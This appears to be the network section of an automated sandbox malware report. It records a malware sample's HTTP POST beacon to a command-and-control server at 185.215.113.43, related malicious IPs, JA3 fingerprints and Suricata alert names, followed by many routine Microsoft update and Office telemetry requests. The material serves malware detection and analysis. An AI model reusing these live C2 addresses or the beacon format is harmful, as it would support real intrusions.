Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49711 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49729 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49736 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49743 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49750 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49742 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49761 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49763 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49720 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49772 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49771 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49788 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49815 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49836 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49846 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49808 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50174 -> 52.168.112.67:443
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=POeRlgA+vAbfxAK&MD=Nl7pHTBF HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=POeRlgA+vAbfxAK&MD=Nl7pHTBF HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
